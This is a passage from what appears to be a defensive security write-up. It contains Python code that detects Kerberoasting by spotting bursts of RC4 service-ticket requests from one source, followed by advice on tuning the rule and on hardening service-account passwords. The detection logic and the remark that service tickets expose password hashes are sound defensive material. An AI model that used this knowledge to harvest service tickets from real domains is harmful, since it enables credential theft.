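    alert when one source collects tickets for several distinct services
    within `window` seconds. A single legacy client asking for one RC4
    ticket (dave -> svc_legacy) stays below the threshold."""
    buckets = defaultdict(list)
    for e in rc4_user_service_tickets(events):
        buckets[(e["TargetUserName"], e["IpAddress"])].append(e)
    alerts = []
    for (user, ip), evs in buckets.items():
        evs.sort(key=lambda e: e["time"])
        span = evs[-1]["time"] - evs[0]["time"]
        services = sorted({e["ServiceName"] for e in evs})
        if len(services) >= min_services and span <= window:
            alerts.append({"requester": user, "source": ip, "services": services})
    return alerts


if __name__ == "__main__":
    for a in find_roasting(CONSTRUCTED_4769):
        print(f"possible Kerberoasting: {a['requester']} from {a['source']} -> {a['services']}")
```

Two things make this rule quieter in production: the burst check above compares only the first and last request of a bucket, so a real feed wants a sliding window, and environments that have set AES-only on service accounts (msDS-SupportedEncryptionTypes) can drop the threshold to one, since any RC4 request for such an account is then itself the anomaly. On the prevention side, the De1ta hint (an 8-character hex password) is the real lesson: SPN-bearing user accounts need long random passwords or a group-managed service account, because the ticket hands the hash to anyone who asks.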
